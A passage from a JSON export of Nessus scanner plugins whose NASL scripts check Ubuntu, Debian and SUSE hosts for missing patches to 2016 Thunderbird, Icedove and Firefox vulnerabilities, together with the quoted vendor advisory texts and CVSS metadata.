\"CVE-2016-5297\", \"CVE-2016-9066\", \"CVE-2016-9079\");\n script_xref(name:\"USN\", value:\"3141-1\");\n\n script_name(english:\"Ubuntu 12.04 LTS / 14.04 LTS / 16.04 LTS / 16.10 : thunderbird vulnerabilities (USN-3141-1)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Christian Holler, Jon Coppeard, Olli Pettay, Ehsan Akhgari, Gary\nKwong, Tooru Fujisawa, and Randell Jesup discovered multiple memory\nsafety issues in Thunderbird. If a user were tricked in to opening a\nspecially crafted message, an attacker could potentially exploit these\nto cause a denial of service via application crash, or execute\narbitrary code. (CVE-2016-5290)\n\nA same-origin policy bypass was discovered with local HTML files in\nsome circumstances. An attacker could potentially exploit this to\nobtain sensitive information. (CVE-2016-5291)\n\nA heap buffer-overflow was discovered in Cairo when processing SVG\ncontent. If a user were tricked in to opening a specially crafted\nmessage, an attacker could potentially exploit this to cause a denial\nof service via application crash, or execute arbitrary code.\n(CVE-2016-5296)\n\nAn error was discovered in argument length checking in JavaScript. If\na user were tricked in to opening a specially crafted website in a\nbrowsing context, an attacker could potentially exploit this to cause\na denial of service via application crash, or execute arbitrary code.\n(CVE-2016-5297)\n\nA buffer overflow was discovered in nsScriptLoadHandler. If a user\nwere tricked in to opening a specially crafted website in a browsing\ncontext, an attacker could potentially exploit this to cause a denial\nof service via application crash, or execute arbitrary code.\n(CVE-2016-9066)\n\nA use-after-free was discovered in SVG animations. If a user were\ntricked in to opening a specially crafted website in a browsing\ncontext, an attacker could exploit this to cause a denial of service\nvia application crash, or execute arbitrary code. (CVE-2016-9079).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3141-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected thunderbird package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Firefox nsSMILTimeContainer::NotifyTimeChange() RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:thunderbird\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/06/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/11/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2016-2019 Canonical, Inc. / NASL script (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(12\\.04|14\\.04|16\\.04|16\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 12.04 / 14.04 / 16.04 / 16.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"12.04\", pkgname:\"thunderbird\", pkgver:\"1:45.5.1+build1-0ubuntu0.12.04.1\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"thunderbird\", pkgver:\"1:45.5.1+build1-0ubuntu0.14.04.1\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"thunderbird\", pkgver:\"1:45.5.1+build1-0ubuntu0.16.04.1\")) flag++;\nif (ubuntu_check(osver:\"16.10\", pkgname:\"thunderbird\", pkgver:\"1:45.5.1+build1-0ubuntu0.16.10.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"thunderbird\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:38:37", "description": "Multiple security issues have been found in Icedove, Debian's version of the Mozilla Thunderbird mail client: Multiple memory safety errors, same-origin policy bypass issues, integer overflows, buffer overflows and use-after-frees may lead to the execution of arbitrary code or denial of service.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version 45.5.1-1~deb7u1.\n\nWe recommend that you upgrade your icedove packages.\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2016-12-20T00:00:00", "type": "nessus", "title": "Debian DLA-752-1 : icedove security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-5290", "CVE-2016-5291", "CVE-2016-5296", "CVE-2016-5297", "CVE-2016-9066", "CVE-2016-9074", "CVE-2016-9079"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:calendar-google-provider", "p-cpe:/a:debian:debian_linux:icedove", "p-cpe:/a:debian:debian_linux:icedove-dbg", "p-cpe:/a:debian:debian_linux:icedove-dev", "p-cpe:/a:debian:debian_linux:iceowl-extension", "cpe:/o:debian:debian_linux:7.0"], "id": "DEBIAN_DLA-752.NASL", "href": "https://www.tenable.com/plugins/nessus/96013", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-752-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(96013);\n script_version(\"3.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-5290\", \"CVE-2016-5291\", \"CVE-2016-5296\", \"CVE-2016-5297\", \"CVE-2016-9066\", \"CVE-2016-9074\", \"CVE-2016-9079\");\n\n script_name(english:\"Debian DLA-752-1 : icedove security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple security issues have been found in Icedove, Debian's version\nof the Mozilla Thunderbird mail client: Multiple memory safety errors,\nsame-origin policy bypass issues, integer overflows, buffer overflows\nand use-after-frees may lead to the execution of arbitrary code or\ndenial of service.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version\n45.5.1-1~deb7u1.\n\nWe recommend that you upgrade your icedove packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2016/12/msg00027.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/icedove\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Firefox nsSMILTimeContainer::NotifyTimeChange() RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:calendar-google-provider\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:icedove\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:icedove-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:icedove-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:iceowl-extension\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/06/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/20\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"calendar-google-provider\", reference:\"45.5.1-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"icedove\", reference:\"45.5.1-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"icedove-dbg\", reference:\"45.5.1-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"icedove-dev\", reference:\"45.5.1-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceowl-extension\", reference:\"45.5.1-1~deb7u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:39:05", "description": "Multiple security issues have been found in Icedove, Debian's version of the Mozilla Thunderbird mail client: Multiple memory safety errors, same-origin policy bypass issues, integer overflows, buffer overflows and use-after-frees may lead to the execution of arbitrary code or denial of service.", "cvss3": {}, "published": "2016-12-12T00:00:00", "type": "nessus", "title": "Debian DSA-3730-1 : icedove - security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-5290", "CVE-2016-5291", "CVE-2016-5296", "CVE-2016-5297", "CVE-2016-9066", "CVE-2016-9074", "CVE-2016-9079"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:icedove", "cpe:/o:debian:debian_linux:8.0"], "id": "DEBIAN_DSA-3730.NASL", "href": "https://www.tenable.com/plugins/nessus/95666", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-3730. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(95666);\n script_version(\"3.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-5290\", \"CVE-2016-5291\", \"CVE-2016-5296\", \"CVE-2016-5297\", \"CVE-2016-9066\", \"CVE-2016-9074\", \"CVE-2016-9079\");\n script_xref(name:\"DSA\", value:\"3730\");\n\n script_name(english:\"Debian DSA-3730-1 : icedove - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple security issues have been found in Icedove, Debian's version\nof the Mozilla Thunderbird mail client: Multiple memory safety errors,\nsame-origin policy bypass issues, integer overflows, buffer overflows\nand use-after-frees may lead to the execution of arbitrary code or\ndenial of service.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/icedove\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2016/dsa-3730\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the icedove packages.\n\nFor the stable distribution (jessie), these problems have been fixed\nin version 1:45.5.1-1~deb8u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Firefox nsSMILTimeContainer::NotifyTimeChange() RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:icedove\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/06/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"calendar-google-provider\", reference:\"1:45.5.1-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"icedove\", reference:\"1:45.5.1-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"icedove-dbg\", reference:\"1:45.5.1-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"icedove-dev\", reference:\"1:45.5.1-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceowl-extension\", reference:\"1:45.5.1-1~deb8u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:38:51", "description": "This update for MozillaFirefox, mozilla-nss fixes security issues and bugs. The following vulnerabilities were fixed in Firefox ESR 45.5.1 (bsc#1009026 bsc#1012964) :\n\n - CVE-2016-9079: Use-after-free in SVG Animation (MFSA 2016-92 bsc#1012964)\n\n - CVE-2016-5297: Incorrect argument length checking in JavaScript (bsc#1010401)\n\n - CVE-2016-9066: Integer overflow leading to a buffer overflow in nsScriptLoadHandler (bsc#1010404)\n\n - CVE-2016-5296: Heap-buffer-overflow WRITE in rasterize_edges_1 (bsc#1010395)\n\n - CVE-2016-9064: Addons update must verify IDs match between current and new versions (bsc#1010402)\n\n - CVE-2016-5290: Memory safety bugs fixed in Firefox 50 and Firefox ESR 45.5 (bsc#1010427)\n\n - CVE-2016-5291: Same-origin policy violation using local HTML file and saved shortcut file (bsc#1010410) The following vulnerabilities were fixed in mozilla-nss 3.21.3 :\n\n - CVE-2016-9074: Insufficient timing side-channel resistance in divSpoiler (bsc#1010422)\n\n - CVE-2016-5285: Missing NULL check in PK11_SignWithSymKey / ssl3_ComputeRecordMACConstantTime causes server crash (bsc#1010517) The following bugs were fixed :\n\n - Firefox would fail to go into fullscreen mode with some window managers (bsc#992549)\n\n - font warning messages would flood console, now using fontconfig configuration from firefox-fontconfig instead of the system one (bsc#1000751)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2016-12-12T00:00:00", "type": "nessus", "title": "SUSE SLES11 Security Update : MozillaFirefox, mozilla-nss (SUSE-SU-2016:3080-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-5285", "CVE-2016-5290", "CVE-2016-5291", "CVE-2016-5296", "CVE-2016-5297", "CVE-2016-9064", "CVE-2016-9066", "CVE-2016-9074", "CVE-2016-9079"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:MozillaFirefox", "p-cpe:/a:novell:suse_linux:MozillaFirefox-translations", "p-cpe:/a:novell:suse_linux:libfreebl3", "p-cpe:/a:novell:suse_linux:libsoftokn3", "p-cpe:/a:novell:suse_linux:mozilla-nss", "p-cpe:/a:novell:suse_linux:mozilla-nss-tools", "cpe:/o:novell:suse_linux:11"], "id": "SUSE_SU-2016-3080-1.NASL", "href": "https://www.tenable.com/plugins/nessus/95712", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2016:3080-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(95712);\n script_version(\"3.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2016-5285\", \"CVE-2016-5290\", \"CVE-2016-5291\", \"CVE-2016-5296\", \"CVE-2016-5297\", \"CVE-2016-9064\", \"CVE-2016-9066\", \"CVE-2016-9074\", \"CVE-2016-9079\");\n\n script_name(english:\"SUSE SLES11 Security Update : MozillaFirefox, mozilla-nss (SUSE-SU-2016:3080-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for MozillaFirefox, mozilla-nss fixes security issues and\nbugs. The following vulnerabilities were fixed in Firefox ESR 45.5.1\n(bsc#1009026 bsc#1012964) :\n\n - CVE-2016-9079: Use-after-free in SVG Animation (MFSA\n 2016-92 bsc#1012964)\n\n - CVE-2016-5297: Incorrect argument length checking in\n JavaScript (bsc#1010401)\n\n - CVE-2016-9066: Integer overflow leading to a buffer\n overflow in nsScriptLoadHandler (bsc#1010404)\n\n - CVE-2016-5296: Heap-buffer-overflow WRITE in\n rasterize_edges_1 (bsc#1010395)\n\n - CVE-2016-9064: Addons update must verify IDs match\n between current and new versions (bsc#1010402)\n\n - CVE-2016-5290: Memory safety bugs fixed in Firefox 50\n and Firefox ESR 45.5 (bsc#1010427)\n\n - CVE-2016-5291: Same-origin policy violation using local\n HTML file and saved shortcut file (bsc#1010410) The\n following vulnerabilities were fixed in mozilla-nss\n 3.21.3 :\n\n - CVE-2016-9074: Insufficient timing side-channel\n resistance in divSpoiler (bsc#1010422)\n\n - CVE-2016-5285: Missing NULL check in PK11_SignWithSymKey\n / ssl3_ComputeRecordMACConstantTime causes server crash\n (bsc#1010517) The following bugs were fixed :\n\n - Firefox would fail to go into fullscreen mode with some\n window managers (bsc#992549)\n\n - font warning messages would flood console, now using\n fontconfig configuration from firefox-fontconfig instead\n of the system one (bsc#1000751)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1000751\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1009026\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1010395\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1010401\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1010402\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1010404\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1010410\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1010422\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1010427\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1010517\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1012964\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=992549\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-5285/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-5290/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-5291/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-5296/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-5297/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-9064/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-9066/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-9074/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-9079/\"\n );\n # https://www.suse.com/support/update/announcement/2016/suse-su-20163080-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?4cc0686a\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE OpenStack Cloud 5:zypper in -t patch\nsleclo50sp3-mfsa2016-90-12882=1\n\nSUSE Manager Proxy 2.1:zypper in -t patch slemap21-mfsa2016-90-12882=1\n\nSUSE Manager 2.1:zypper in -t patch sleman21-mfsa2016-90-12882=1\n\nSUSE Linux Enterprise Software Development Kit 11-SP4:zypper in -t\npatch sdksp4-mfsa2016-90-12882=1\n\nSUSE Linux Enterprise Server 11-SP4:zypper in -t patch\nslessp4-mfsa2016-90-12882=1\n\nSUSE Linux Enterprise Server 11-SP3-LTSS:zypper in -t patch\nslessp3-mfsa2016-90-12882=1\n\nSUSE Linux Enterprise Point of Sale 11-SP3:zypper in -t patch\nsleposp3-mfsa2016-90-12882=1\n\nSUSE Linux Enterprise Debuginfo 11-SP4:zypper in -t patch\ndbgsp4-mfsa2016-90-12882=1\n\nSUSE Linux Enterprise Debuginfo 11-SP3:zypper in -t patch\ndbgsp3-mfsa2016-90-12882=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Firefox nsSMILTimeContainer::NotifyTimeChange() RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:MozillaFirefox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:MozillaFirefox-translations\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libfreebl3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsoftokn3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:mozilla-nss\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:mozilla-nss-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/06/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) 